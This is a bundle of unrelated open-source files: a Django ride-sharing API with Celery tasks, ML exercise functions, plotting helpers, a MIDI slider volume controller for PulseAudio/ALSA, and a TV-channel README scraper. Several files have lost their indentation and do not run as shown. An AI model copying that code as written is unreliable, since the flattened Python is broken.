ordering = ('departure_date', 'arrival_date', 'available_seats')
def dispatch(self, request, *args, **kwargs):
"""Verify that circle exists"""
slug_name = kwargs['slug_name']
self.circle = get_object_or_404(Circle, slug_name=slug_name)
return super(RideViewSet, self).dispatch(request, *args, **kwargs)
def get_permissions(self):
permissions = [IsAuthenticated, IsActiveCircleMember]
if self.action in ['update', 'partial_update', 'finish']:
permissions.append(IsRideOwner)
if self.action == 'join':
permissions.append(IsNotRideOwner)
return [p() for p in permissions]
def get_serializer_context(self):
context = super(RideViewSet, self).get_serializer_context()
context['circle'] = self.circle
return context
def get_serializer_class(self):
if self.action=='create':
return CreateRideSerializer
if self.action=='join':
return JoinRideSerializer
if self.action=='finish':
return EndRideSerializer
if self.action=='rate':
return CreateRideRatingSerializer
return RideModelSerializer
def get_queryset(self):
if self.action!='finish':
offset = timezone.now() - timedelta(minutes=15)
return self.circle.ride_set.filter(departure_date__gte=offset, is_active=True, available_seats__gte=1)
return self.circle.ride_set.all()
@action(detail=True, methods=['post'])
def join(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(ride, data={'passenger': request.user.pk}, context={'circle': self.circle, 'ride': ride}, partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_200_OK)
@action(detail=True, methods=['post'])
def finish(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
serializer = serializer_class(ride, data={'is_active': False, 'current_time': timezone.now()}, context=self.get_serializer_context(), partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_200_OK)
@action(detail=True, methods=['post'])
def rate(self, request, *args, **kwargs):
ride = self.get_object()
serializer_class = self.get_serializer_class()
context = self.get_serializer_context()
context['ride'] = ride
serializer = serializer_class(data=request.data, context=context, partial=True)
serializer.is_valid(raise_exception=True)
ride = serializer.save()
data = RideModelSerializer(ride).data
return Response(data, status=status.HTTP_201_CREATED)
```
#### File: cride/taskapp/tasks.py
```python
from django.template.loader import render_to_string
from django.utils import timezone
from datetime import timedelta
from django.conf import settings
from django.core.mail import EmailMultiAlternatives
from cride.users.models import User, Profile
from cride.rides.models import Ride
import jwt
import time
# Celery
from celery.decorators import task, periodic_task
def gen_verification_token(user):
"""Create JWT"""
exp_date = timezone.now() + timedelta(days=3)
payload = {
'user': user.username,
'exp': int(exp_date.timestamp()),
'type': 'email_confirmation'
}
token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')
return token.decode()
@task(name='send_confirmation_email', max_retries=3)
def send_confirmation_email(user_pk):
    """Send account verification email"""
for i in range(7):
time.sleep(1)
print(f'1 second delay i:{i+1}')
user = User.objects.get(pk=user_pk)
verification_token = gen_verification_token(user)
subject = f"Welcome {user.username}! Verify your account to start using the app"
from_email = 'Comparte Ride <<EMAIL>>'
to = user.email
content = render_to_string('email/users/account_verification.html', {'token': verification_token, 'user': user})
msg = EmailMultiAlternatives(subject, content, from_email, [to])
msg.attach_alternative(content, "text/html")
msg.send()
@periodic_task(name='disable_finished_rides', run_every=timedelta(days=1))
def disable_finished_rides():
now = timezone.now()
offset = now + timedelta(seconds=5)
rides = Ride.objects.filter(arrival_date__gte=now, arrival_date__lte=offset, is_active=True)
rides.update(is_active=False)
```
|
{
"source": "jesussantana/Machine-Learning-Stanford-University",
"score": 3
}
|
#### File: Ex2-Logistic-Regression/ex2-py/predict.py
```python
import numpy as np
from sigmoid import sigmoid
def predict(theta, X):
theta = theta.reshape((theta.size, 1))
p = sigmoid(X.dot(theta))
return np.round(p)
```
#### File: Ex3-Neural-Networks/ex3-py/oneVsAll.py
```python
import numpy as np
from scipy.optimize import fmin_cg
from sigmoid import sigmoid
from lrCostFunction import lrCostFunction
def oneVsAll(X, y, num_labels, lamda):
m, n = X.shape
all_theta = np.zeros((num_labels, n + 1))
X = np.hstack((np.ones((m, 1)), X))
cost_function = lambda p, y: lrCostFunction(p, X, y, lamda)[0]
grad_function = lambda p, y: lrCostFunction(p, X, y, lamda)[1]
for i in range(1, num_labels + 1):
initial_theta = np.zeros(n + 1)
all_theta[i - 1, :] = fmin_cg(cost_function, initial_theta, fprime=grad_function,
args=((y == i).astype(int),), maxiter=100, disp=False)
print('Finish oneVsAll checking number: %d' % i)
return all_theta
```
#### File: Ex3-Neural-Networks/ex3-py/predictOneVsAll.py
```python
import numpy as np
from sigmoid import sigmoid
def predictOneVsAll(all_theta, X):
m = X.shape[0]
X = np.hstack((np.ones((m, 1)), X))
p = np.argmax(sigmoid(X.dot(all_theta.T)), axis=1) + 1
return p.reshape((p.size, 1))
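# Note: labels are assumed to be 1-indexed here (in the ex3 dataset the digit 0 is stored as
# label 10), hence the "+ 1" added to the 0-based argmax over the class columns.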
```
|
{
"source": "jesussantana/Predicting-Cardano-Price",
"score": 2
}
|
#### File: Predicting-Cardano-Price/scripts/display_graphics.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# ^^^ pyforest auto-imports - don't write above this line
# ==============================================================================
# Auto Import Dependencies
# ==============================================================================
# pyforest imports dependencies according to use in the notebook
# ==============================================================================
# Dependencies not Included in Auto Import*
# ==============================================================================
import matplotlib.ticker as ticker
# Distribution of Target Variable
# ==============================================================================
def Target_Distribution(df, target):
fig, axes = plt.subplots(nrows=3, ncols=1, figsize=(15, 10))
sns.distplot(
df[target],
hist = False,
rug = True,
color = "navy",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[0]
)
axes[0].set_title("Original layout", fontsize = 'medium')
axes[0].set_xlabel(f'{target}', fontsize='small')
axes[0].tick_params(labelsize = 6)
sns.distplot(
np.sqrt(df[target]),
hist = False,
rug = True,
color = "purple",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[1]
)
axes[1].set_title("Square root transformation", fontsize = 'medium')
axes[1].set_xlabel(f'sqrt(var)', fontsize='small')
axes[1].tick_params(labelsize = 6)
"""sns.distplot(
np.log(df[target]),
hist = False,
rug = True,
color = "coral",
kde_kws = {'shade': True, 'linewidth': 1},
ax = axes[2]
)
axes[2].set_title("Logarithmic transformation", fontsize = 'medium')
axes[2].set_xlabel(f'log({target})', fontsize='small')
axes[2].tick_params(labelsize = 6)
"""
fig.suptitle(f'Distribution of the {target} Variable', fontsize = 30, fontweight = "bold")
fig.tight_layout()
plt.savefig(f"../reports/figures/{target}_Distribution_Variable.png")
# Distribution graph for each numerical variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Numerical_Distribution(df, var, name, cols, rows):
fig, axes = plt.subplots(ncols=cols, nrows=rows, figsize=(cols*5, rows*5))
axes = axes.flat
columnas_numeric = df.select_dtypes(include=['float64', 'int']).columns
columnas_numeric = columnas_numeric.drop(f'{var}')
for i, colum in enumerate(columnas_numeric):
sns.histplot(
data = df,
x = colum,
stat = "count",
kde = True,
color = (list(plt.rcParams['axes.prop_cycle'])*2)[i]["color"],
line_kws= {'linewidth': 2},
alpha = 0.3,
ax = axes[i]
)
axes[i].set_title(colum, fontsize = 16, fontweight = "bold")
axes[i].tick_params(labelsize = 16)
axes[i].set_xlabel("")
fig.tight_layout()
plt.subplots_adjust(top = 0.9)
fig.suptitle(f'Distribution Numerical Variable {name}' , fontsize = cols*4, fontweight = "bold")
plt.savefig(f'../reports/figures/Distribution_Numerical_Variable_{name}.png')
# Correlation & Distribution graph for each numerical variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Numerical_Correlation(df, target, drop ,cols, rows):
fig, axes = plt.subplots(ncols=cols, nrows=rows, figsize=(cols*5, rows*5))
axes = axes.flat
columnas_numeric = df.select_dtypes(include=['float64', 'int']).columns
columnas_numeric = columnas_numeric.drop(drop)
for i, colum in enumerate(columnas_numeric):
sns.regplot(
x = df[colum],
y = df[target],
color = "navy",
marker = '.',
scatter_kws = {"alpha":0.4},
line_kws = {"color":"r","alpha":0.7},
ax = axes[i]
)
axes[i].set_title(f"{target} vs {colum}", fontsize = 16, fontweight = "bold")
#axes[i].ticklabel_format(style='sci', scilimits=(-4,4), axis='both')
axes[i].yaxis.set_major_formatter(ticker.EngFormatter())
axes[i].xaxis.set_major_formatter(ticker.EngFormatter())
axes[i].tick_params(labelsize = 16)
axes[i].set_xlabel("")
axes[i].set_ylabel("")
#if (i-1 >= len(columnas_numeric)-1): break
# Empty axes are removed
"""for i in [8]:
fig.delaxes(axes[i])"""
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'Correlation with {target}', fontsize = cols*4, fontweight = "bold")
plt.savefig(f"../reports/figures/Correlation_Each_Numerical_Variable_with_{target}.png")
# Correlation between numeric columns
# ==============================================================================
def tidy_corr_matrix(df):
# Function to convert a pandas correlation matrix to tidy format
#df.drop(drop)
corr_mat = df.select_dtypes(include=['float64', 'int']).corr(method='pearson')
corr_mat = corr_mat.stack().reset_index()
corr_mat.columns = ['variable_1','variable_2','r']
corr_mat = corr_mat.loc[corr_mat['variable_1'] != corr_mat['variable_2'], :]
corr_mat['abs_r'] = np.abs(corr_mat['r'])
corr_mat = corr_mat.sort_values('abs_r', ascending=False)
return corr_mat
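# Usage sketch: the first rows of the tidy matrix are the strongest absolute correlations,
# e.g. tidy_corr_matrix(df).head(10) gives a quick ranking of related variable pairs.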
# Heatmap matrix of correlations
# ==============================================================================
def heat_map(df, name):
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(15, 15))
#df.drop(drop)
    corr = df.select_dtypes(include=['float64', 'int']).corr(method='pearson')
# Getting the Upper Triangle of the co-relation matrix
matrix = np.triu(corr)
# using the upper triangle matrix as mask
sns.heatmap(corr,
annot=True,
mask=matrix,
cmap=sns.diverging_palette(150, 275, s=80, l=55, n=9),
annot_kws = {"size": 10})
ax.set_xticklabels(
ax.get_xticklabels(),
rotation = 45,
horizontalalignment = 'right',
)
ax.set_yticklabels(
ax.get_yticklabels(),
rotation = 0,
horizontalalignment = 'right',
)
ax.tick_params(labelsize = 15)
fig.suptitle(f'Heatmap Correlation Matrix {name}', fontsize = 30, fontweight = "bold")
plt.savefig(f"../reports/figures/Heatmap_Matrix_Correlations_{name}.png")
# Graph for each qualitative variable
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Qualitative_Distribution(df, name, rows, cols):
fig, axes = plt.subplots(nrows=rows, ncols=cols, figsize=(rows*10, rows*50))
axes = axes.flat
columnas_object = df.select_dtypes(include=['object']).columns
for i, colum in enumerate(columnas_object):
df[colum].value_counts().plot.barh(ax = axes[i])
axes[i].set_title(colum, fontsize = 16, fontweight = "bold")
axes[i].tick_params(labelsize = 11)
axes[i].set_xlabel("")
# Empty axes are removed
#for i in [7, 8]:
#fig.delaxes(axes[i])
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'Qualitative variable distribution {name}',
fontsize = 30, fontweight = "bold")
plt.savefig(f"../reports/figures/Each_Qualtitative_Variable_{name}.png")
# Graph relationship between the Target and each qualitative variables
# ==============================================================================
# Adjust number of subplots based on the number of columns
def Qualitative_Relationship(df, var, rows, cols):
fig, axes = plt.subplots(nrows=rows, ncols=cols, figsize=(100, 60))
axes = axes.flat
columnas_object = df.select_dtypes(include=['object']).columns
for i, colum in enumerate(columnas_object):
sns.violinplot(
x = colum,
y = var,
data = df,
color = "coral",
ax = axes[i]
)
axes[i].set_title(f"{colum} vs {var}", fontsize = 30, fontweight = "bold")
axes[i].yaxis.set_major_formatter(ticker.EngFormatter())
axes[i].tick_params(labelsize = 22)
axes[i].set_xticklabels(axes[i].get_xticklabels(),rotation = 45, horizontalalignment = 'right')
axes[i].set_xlabel("")
axes[i].set_ylabel("")
# Empty axes are removed
#for i in [7, 8]:
#fig.delaxes(axes[i])
fig.tight_layout()
plt.subplots_adjust(top=0.9)
fig.suptitle(f'{var} distribution by group', fontsize = 60, fontweight = "bold")
plt.savefig(f"../reports/figures/Target_vs_Qualitative_Variable_{var}.png")
# Graph adjusted intertia BestK for KMeans
# ==============================================================================
def inertia(results):
# plot the results
plt.figure(figsize=(14,8))
plt.plot(results,'-o')
plt.title('Adjusted Inertia for each K')
plt.xlabel('K')
plt.ylabel('Adjusted Inertia')
plt.xticks(range(2,len(results),1))
plt.savefig("../../reports/figures/BestK_for_KMeans.png");
# Graph PCA
# ==============================================================================
def pca(pca):
PC = range(1, pca.n_components_+1)
plt.figure(figsize=(12,6))
plt.bar(PC, pca.explained_variance_ratio_, color=('navy','b','g','r','coral','c','m','y','k','gray'))
plt.xlabel('Principal Components')
plt.ylabel('Variance %')
plt.title('Principal Components Variance')
plt.xticks(PC);
plt.savefig(f"../../reports/figures/Principal_Components{pca.n_components}.png");
```
|
{
"source": "jesusvallejo/Midi2Vol-Linux",
"score": 2
}
|
#### File: jesusvallejo/Midi2Vol-Linux/midi2vol.py
```python
import sys
import os
import rtmidi
import math
import time
import pulsectl
import alsaaudio
import json
import logging
import getpass
import threading
import subprocess
import shutil
from datetime import datetime
import pystray
from pystray import MenuItem as MenuItem
from PIL import Image, ImageDraw
# paths
defaultPath=os.path.dirname(os.path.realpath(__file__)) # to force the location os.path.expanduser('~/MidiDev/')
eOS_iconPath=os.path.expanduser('~/.local/share/icons/')
iconsPath=os.path.join(defaultPath,'icons')
# filenames
filename=os.path.splitext(os.path.basename(__file__))[0]
defaultAppConfigFile='appConfig.json'
defaultConfigFile='config.json'
defaultLogginFile=filename+'.log'# to force a logging name 'midi2vol.log'
iconCon_img='NanoSlider.png'
iconDis_img='NanoSliderDis.png'
iconCon_tray='TrayWhiteIconCon.png'
iconDis_tray='TrayWhiteIconDis.png'
# Default json
appConfigJson = """ [
{"name": "Default","AppRaw": "0x3e","PulseName": "default"},
{"name": "Spotify","AppRaw": "0x3f","PulseName": "Spotify"},
{"name": "Discord","AppRaw": "0x40","PulseName": "playStream"},
{"name": "Google Chrome","AppRaw": "0x41","PulseName": "Playback"},
{"name": "Firefox","AppRaw": "0x41","PulseName": "AudioStream"}
]"""
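# Each appConfig entry maps the MIDI data byte sent by the slider ("AppRaw") to a PulseAudio
# sink-input name ("PulseName"). A new application could be controlled by appending an entry,
# e.g. {"name": "VLC", "AppRaw": "0x42", "PulseName": "audio stream"} (values here are
# illustrative, not taken from this project).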
configJson = """ {
"NotifyStatus": "true",
"trayBarIcon": "default",
"audioService":"pulse"
} """
# flags
elementaryOS=False
noNotify = False
SHOULD_TERMINATE = False
def eOSNotification(defaultPath,eOS_iconPath,iconCon_img,iconDis_img):
global elementaryOS
elementaryOS = True
if os.path.isfile(os.path.join(eOS_iconPath,iconCon_img)) == False:
shutil.copyfile(os.path.join(iconsPath,iconCon_img), os.path.join(eOS_iconPath,iconCon_img))
if os.path.isfile(os.path.join(eOS_iconPath,iconDis_img)) == False:
shutil.copyfile(os.path.join(iconsPath,iconDis_img), os.path.join(eOS_iconPath,iconDis_img))
def bento():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoBento.png'
iconDis_img = 'NanoBentoDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def wavez():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoWavez.png'
iconDis_img = 'NanoWavezDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def mizu():
global iconCon_img
global iconDis_img
iconCon_img = 'NanoMizu.png'
iconDis_img = 'NanoMizuDis.png'
if elementaryOS == True:
eOSNotification(iconsPath,eOS_iconPath,iconCon_img,iconDis_img)
return
def trayIcon(icon_img):
global icon
image=Image.open(icon_img)
menu = (pystray.MenuItem('Exit', lambda:endProgram()),)
icon=pystray.Icon(filename, image,filename,menu)
return icon
def endProgram():
global icon ,t,SHOULD_TERMINATE
if( threading.current_thread() == threading.main_thread()):
print("main")
else:
print("not main")
SHOULD_TERMINATE = True
t.join()
icon.visible = False
icon.stop()
sys.exit("midi stopped\n")
def sendmessage(status):
if(noNotify):
return
global iconCon,iconDis,iconConTray,iconDisTray
iconCon = os.path.join(iconsPath,iconCon_img)
iconDis = os.path.join(iconsPath,iconDis_img)
iconConTray = os.path.join(iconsPath,iconCon_tray)
iconDisTray = os.path.join(iconsPath,iconDis_tray)
if(status =='connected'):
image=Image.open(iconConTray)
icon.icon = image
text='nano. slider is ready'
img = iconCon
if(elementaryOS):
img= os.path.splitext(iconCon_img)[0]
elif(status == 'disconnected'):
image=Image.open(iconDisTray)
icon.icon = image
text='nano. slider is not present'
img = iconDis
if(elementaryOS):
img= os.path.splitext(iconDis_img)[0]
subprocess.Popen(["notify-send", "-i", img, filename, text])
return
def openNano(midi_in):
count=nanoIsConnected(midi_in) # returns true if port is correctly opened, false if not
if (count!=-1):
midi_in.open_port(count)
logging.warning('openNano: opened port successfully')
return True
else:
logging.error('openNanoError: could not find nano. slider')
return False
def nanoIsConnected(midi_in): #if nano is connected returns position in list, if not returns -1
count = 0
for port_name in midi_in.get_ports():
if (port_name.split(":")[0] == "nano. slider"):
#logging.warning('nano. slider found')
return count
else:
count = count + 1
logging.warning('could not find nano. slider')
return -1
def execution(midi_in,sinkType,appConfig):
global iconCon,iconDis,SHOULD_TERMINATE
iconCon = os.path.join(iconsPath,iconCon_img)
iconDis = os.path.join(iconsPath,iconDis_img)
oldVolumeRaw = -1
paready = False
if (openNano(midi_in)): # if connected to nano , check if there's a message
while (nanoIsConnected(midi_in) != -1 and SHOULD_TERMINATE == False):
global reported
reported=False
midiMessage= midi_in.get_message()
if (midiMessage): # if rtmidi gives None as a message , sleep the thread to avoid overloading cpu
message = midiMessage[0] # rtmidi lib , passes a tuple [midiMessage , timeStamp], we need the message
applicationRaw=message[1] # gives option to change volume of source ex: Spotify , Chrome, etc.
volumeRaw = message[2] # Message is an array in wich the third argument is the value of the potentiometer slider from 0 to 127
if (volumeRaw > oldVolumeRaw+1 or volumeRaw < oldVolumeRaw-1): # check if slider positon has changed
oldVolumeRaw= volumeRaw #update value for next iteration
if(sinkType=="alsa"): # if alsa is chosen values go from 0 to 100
volume = math.floor((volumeRaw/3)*2.38)
alsaaudio.Mixer().setvolume(volume) # change volume with alsa
elif(sinkType=="pulse"): # if pulse audio is chosen values go from 0 to 1 , in 0.01 steps
if(paready==False): # check if pulse audio server is running or will panick
stat = os.system('pulseaudio --check')
if(stat == 0):
paready = True
sendmessage('connected')
logging.warning('midi2vol -p is ready')
else:
logging.warning('PulseAudio server is not avaible')
else:
                            logging.warning('calling pulse') # If PulseAudio server is ready change volume with pulse
pulseSink(midi_in,applicationRaw,volumeRaw,appConfig)
time.sleep(0.01) # Sleep thread for a while
if(SHOULD_TERMINATE==True): # Exit has been called kill my self
sys.exit('killing thread')
logging.error('executionError: could find nano. slider midi interface')
sendmessage('disconnected')
if (midi_in.is_port_open()): # Close midi port
midi_in.close_port()
while (nanoIsConnected(midi_in)==-1): # Actively poll to detect nano slider reconnection
time.sleep(0.5) # To not overflow the recursion stack
execution(midi_in,sinkType,appConfig) # Nano is now present launch thread
def pulseSink(MidiIn,applicationRaw,volumeRaw,appConfig): # Checks midi hex against the json
volume = math.floor((volumeRaw/3)*2.38)/100
with pulsectl.Pulse('event-printer') as pulse:
default = appConfig[0]
if (hex(applicationRaw)== default['AppRaw']):
pulseAllSink(volume,pulse)
else:
logging.warning('App Volume selected:%s'%(hex(applicationRaw)))
pulseApp(volume,pulse,applicationRaw,appConfig)
def pulseAllSink(volume,pulse): # Changes all output sinks volume
for sink in pulse.sink_list():
pulse.volume_set_all_chans(sink, volume)
logging.warning('Volume %d set for all sinks'%(volume*100))
def pulseApp(volume,pulse,applicationRaw,appConfig): # Controls per app volume using pulse
for app in appConfig:
if(app['AppRaw'] == hex(applicationRaw)):
if(pulse.sink_input_list()==[]):
logging.warning('no apps playing audio')
for source in pulse.sink_input_list():
name = source.name
if (name == app['PulseName']): # if sink input exists
sinkVolume = source.volume
sinkVolume.value_flat = volume
pulse.volume_set(source,sinkVolume)
logging.warning('Volume %d set for application %s: %s'%(volume*100,app['name'],hex(applicationRaw)))
break
def loadAppConfig(targetfile):
try:
with open(targetfile) as f:
try:
global appConfig
appConfig = json.load(f)
logging.warning('%s correctly loaded'%(targetfile))
except:
os.rename(os.path.realpath(targetfile), os.path.realpath(targetfile)+".bak")
f = open(os.path.realpath(targetfile), "w")
logging.warning('Error loading %s,backing up old one, creating new one(check parsing)'%(targetfile))
f.write(appConfigJson)
f.close()
main()
except:
logging.warning('Error loading %s, will create a new one'%(targetfile))
f= open(targetfile,"w+")
f.write(appConfigJson)
f.close()
main()
def loadConfig(targetfile):
try:
with open(targetfile) as f:
try:
global config
config = json.load(f)
logging.warning('%s correctly loaded'%(targetfile))
except:
os.rename(os.path.realpath(targetfile), os.path.realpath(targetfile)+".bak")
f = open(os.path.realpath(targetfile), "w")
logging.warning('Error loading %s,backing up old one, creating new one(check parsing)'%(targetfile))
f.write(configJson)
f.close()
main()
except:
logging.warning('Error loading %s, will create a new one'%(targetfile))
f= open(targetfile,"w+")
f.write(configJson)
f.close()
main()
def main():
global appConfig , config , t
argv = sys.argv
if (len(argv)>1): # console mode
count=0
targetfile = os.path.join(defaultPath,defaultAppConfigFile)
for arg in argv:
if(arg == '--noicon'):
global noNotify
noNotify= True
if(arg == '--bento'):
bento()
if(arg == '--wavez'):
wavez()
if(arg == '--mizu'):
mizu()
if(arg == "-e"):
eOSNotification(defaultPath,eOS_iconPath,iconCon_img,iconDis_img)
if(arg == "-d"):
logging.basicConfig(filename=os.path.join(defaultPath,defaultLogginFile),level=logging.WARNING)
logging.warning('----------------------------')
logging.warning(datetime.now())
logging.warning('----------------------------')
logging.warning(getpass.getuser())
logging.warning('----------------------------')
if(arg =='-t'):
targetfile = argv[count+1]
logging.warning(targetfile)
count = count+1
loadAppConfig(targetfile)
for arg in argv:
if(arg== "--pulse" or arg== "-p"):
try:
global icon
icon = trayIcon(os.path.join(iconsPath,iconCon_tray))
time.sleep(3) # SEEMS TO HELP WITH APPS PROBLEM(PULSEAUDIO SEES ALL SINKS, BUT DOESNT SINK INPUTS, RESULTING IN PER APP CONTROL NOT WORKING)
midi_in = rtmidi.MidiIn()
t=threading.Thread(name = 'midiExecution',target = execution,args =(midi_in,"pulse",appConfig))
t.daemon = True
t.start()
icon.run()
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
elif(arg== "--alsa" or arg== "-a"):
try:
midi_in = rtmidi.MidiIn()
execution(midi_in,"alsa",appConfig)
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
else:
print("Please call me with a valid argument")
print("Unknown argument, For alsa sink use arguments --alsa/-a or --pulse/-p for pulse sink")
sys.exit()
else:
targetfile = os.path.join(defaultPath,defaultAppConfigFile)# AppConfig file
loadAppConfig(targetfile)
targetfile = os.path.join(defaultPath,defaultConfigFile)# AppConfig file
loadConfig(targetfile)
        if(config["NotifyStatus"]=="false"):
            noNotify = True
        if(config["trayBarIcon"]== "mizu"):
            mizu()
        if(config["trayBarIcon"]== "bento"):
            bento()
        if(config["trayBarIcon"]== "wavez"):
            wavez()
if(config["audioService"]=="pulse"):
try:
icon = trayIcon(os.path.join(iconsPath,iconCon_tray))
time.sleep(3) # SEEMS TO HELP WITH APPS PROBLEM(PULSEAUDIO SEES ALL SINKS, BUT DOESNT SINK INPUTS, RESULTING IN PER APP CONTROL NOT WORKING)
midi_in = rtmidi.MidiIn()
t=threading.Thread(name = 'midiExecution',target = execution,args =(midi_in,"pulse",appConfig))
t.start()
icon.run()
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
elif(config["audioService"]=="alsa"):
try:
midi_in = rtmidi.MidiIn()
execution(midi_in,"alsa",appConfig)
except:
logging.exception("Error with rtmidi")
sys.exit("Error, check log")
else:
print("Invalid audioService , check config.json")
sys.exit()
if __name__== "__main__":
main()
```
|
{
"source": "jesusvlc/TDTChannels",
"score": 3
}
|
#### File: TDTChannels/script/my_script.py
```python
import json
import requests
from ambit import Ambito
from channel import Channel
from country import Country
def substring(text, match):
return text.split(match)
def stringbetween(text, start, end):
text_from_start_to_all = substring(text, start)[1]
text_from_start_to_end = substring(text_from_start_to_all, end)[0]
return text_from_start_to_end
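# For example, stringbetween("[Web](https://example.com)", "(", ")") returns "https://example.com",
# which is how the markdown links in the README are unwrapped below.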
def get_channels_from_part(text):
line_where_first_channel_starts = 15
attributes_per_item = 6
channel_list = []
list_to_iterate = text.split("|")[line_where_first_channel_starts:]
while "\n" in list_to_iterate:
list_to_iterate.remove("\n")
while "\n\n" in list_to_iterate:
list_to_iterate.remove("\n\n")
for i in range(0, len(list_to_iterate), attributes_per_item):
item_name = list_to_iterate[i].strip()
item_options = list_to_iterate[i + 1].strip()
item_web = list_to_iterate[i + 2].strip()
if len(item_web) > 0 and item_web[0] != "-":
item_web = stringbetween(item_web, "(", ")")
if len(item_web) == 1:
item_web = ""
item_resolution = list_to_iterate[i + 3].strip()
if len(item_resolution) == 1:
item_resolution = ""
item_logo = list_to_iterate[i + 4].strip()
if len(item_logo) > 0 and item_logo[0] != "-":
item_logo = stringbetween(item_logo, "(", ")")
if len(item_logo) == 1:
item_logo = ""
item_epg = list_to_iterate[i + 5].strip()
if len(item_epg) == 1:
item_epg = ""
item_options = item_options.split(" - ")
channel = Channel(item_name, item_web, item_resolution, item_logo, item_epg)
if len(item_options) > 0 and item_options[0] != "-":
for option in item_options:
format = (option[1:5]).replace("]", "")
url = stringbetween(option, "(", ")")
channel.add_option(format, url)
channel_list.append(channel)
return channel_list
page = requests.get('https://raw.githubusercontent.com/LaQuay/TDTChannels/master/README.md',
headers={'Cache-Control': 'no-cache'})
content = str(page.text)
spain = Country("Spain")
canales_nacionales = stringbetween(content, "### Nacionales", "### Informativos")
spain.add_ambit(Ambito("Generalistas", get_channels_from_part(canales_nacionales)))
canales_informativos = stringbetween(content, "### Informativos", "### Deportivos")
spain.add_ambit(Ambito("Informativos", get_channels_from_part(canales_informativos)))
canales_deportivos = stringbetween(content, "### Deportivos", "### Infantiles")
spain.add_ambit(Ambito("Deportivos", get_channels_from_part(canales_deportivos)))
canales_infantiles = stringbetween(content, "### Infantiles", "### Musicales")
spain.add_ambit(Ambito("Infantiles", get_channels_from_part(canales_infantiles)))
canales_musicales = stringbetween(content, "### Musicales", "### Autonómicos")
spain.add_ambit(Ambito("Musicales", get_channels_from_part(canales_musicales)))
canales_autonomicos_andalucia = stringbetween(content, "#### Andalucía", "#### Aragón")
spain.add_ambit(Ambito("Andalucía", get_channels_from_part(canales_autonomicos_andalucia)))
canales_autonomicos_aragon = stringbetween(content, "#### Aragón", "#### Asturias")
spain.add_ambit(Ambito("Aragón", get_channels_from_part(canales_autonomicos_aragon)))
canales_autonomicos_asturias = stringbetween(content, "#### Asturias", "#### Canarias")
spain.add_ambit(Ambito("Asturias", get_channels_from_part(canales_autonomicos_asturias)))
canales_autonomicos_canarias = stringbetween(content, "#### Canarias", "#### Cantabria")
spain.add_ambit(Ambito("Canarias", get_channels_from_part(canales_autonomicos_canarias)))
canales_autonomicos_cantabria = stringbetween(content, "#### Cantabria", "#### Castilla la Mancha")
spain.add_ambit(Ambito("Cantabria", get_channels_from_part(canales_autonomicos_cantabria)))
canales_autonomicos_castilla_mancha = stringbetween(content, "#### Castilla la Mancha", "#### Castilla y León")
spain.add_ambit(Ambito("Castilla la Mancha", get_channels_from_part(canales_autonomicos_castilla_mancha)))
canales_autonomicos_castilla_leon = stringbetween(content, "#### Castilla y León", "#### Catalunya")
spain.add_ambit(Ambito("Castilla y León", get_channels_from_part(canales_autonomicos_castilla_leon)))
canales_autonomicos_catalunya = stringbetween(content, "#### Catalunya", "#### Ceuta")
spain.add_ambit(Ambito("Catalunya", get_channels_from_part(canales_autonomicos_catalunya)))
canales_autonomicos_ceuta = stringbetween(content, "#### Ceuta", "#### Extremadura")
spain.add_ambit(Ambito("Ceuta", get_channels_from_part(canales_autonomicos_ceuta)))
canales_autonomicos_extremadura = stringbetween(content, "#### Extremadura", "#### Galicia")
spain.add_ambit(Ambito("Extremadura", get_channels_from_part(canales_autonomicos_extremadura)))
canales_autonomicos_galicia = stringbetween(content, "#### Galicia", "#### Islas Baleares")
spain.add_ambit(Ambito("Galicia", get_channels_from_part(canales_autonomicos_galicia)))
canales_autonomicos_islas_baleares = stringbetween(content, "### Islas Baleares", "#### Madrid")
spain.add_ambit(Ambito("Islas Baleares", get_channels_from_part(canales_autonomicos_islas_baleares)))
canales_autonomicos_madrid = stringbetween(content, "#### Madrid", "#### Melilla")
spain.add_ambit(Ambito("Madrid", get_channels_from_part(canales_autonomicos_madrid)))
canales_autonomicos_melilla = stringbetween(content, "#### Melilla", "#### Murcia")
spain.add_ambit(Ambito("Melilla", get_channels_from_part(canales_autonomicos_melilla)))
canales_autonomicos_murcia = stringbetween(content, "#### Murcia", "#### Navarra")
spain.add_ambit(Ambito("Murcia", get_channels_from_part(canales_autonomicos_murcia)))
canales_autonomicos_navarra = stringbetween(content, "#### Navarra", "#### Pais Vasco")
spain.add_ambit(Ambito("Navarra", get_channels_from_part(canales_autonomicos_navarra)))
canales_autonomicos_pais_vasco = stringbetween(content, "#### Pais Vasco", "#### La Rioja")
spain.add_ambit(Ambito("Pais Vasco", get_channels_from_part(canales_autonomicos_pais_vasco)))
canales_autonomicos_la_rioja = stringbetween(content, "#### La Rioja", "#### Valencia")
spain.add_ambit(Ambito("La Rioja", get_channels_from_part(canales_autonomicos_la_rioja)))
canales_autonomicos_valencia = stringbetween(content, "#### Valencia", "## Internacionales")
spain.add_ambit(Ambito("Valencia", get_channels_from_part(canales_autonomicos_valencia)))
# Save data to JSON file
json_file = open('./public/output/channels.json', "w+")
# TODO Add copyright
json_file.write(json.dumps(spain.to_json()))
json_file.close()
